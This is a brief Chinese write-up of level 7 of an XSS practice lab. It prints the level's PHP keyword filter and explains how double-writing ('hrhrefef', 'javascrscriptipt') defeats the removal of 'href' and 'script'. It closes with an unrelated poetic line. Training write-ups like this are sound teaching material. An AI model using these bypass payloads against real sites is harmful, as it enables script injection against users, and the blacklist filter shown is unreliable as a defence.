XXS level7
(1)输入与第六关相同的Payload:"><A HREF="javascript:alert()">
查看页面源代码,发现“herf"被过滤了
(2)查看PHP源代码
$str =strtolower( $_GET["keyword"]); $str2=str_replace("script","",$str); $str3=str_replace("on","",$str2); $str4=str_replace("src","",$str3); $str5=str_replace("data","",$str4); $str6=str_replace("href","",$str5);
加粗部分都被过滤,转化为空,同时加上了strtolower,无法使用大写避过。
(3)可以使用双写绕过。
"><a hrhrefef="javascrscriptipt:alert()">
由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。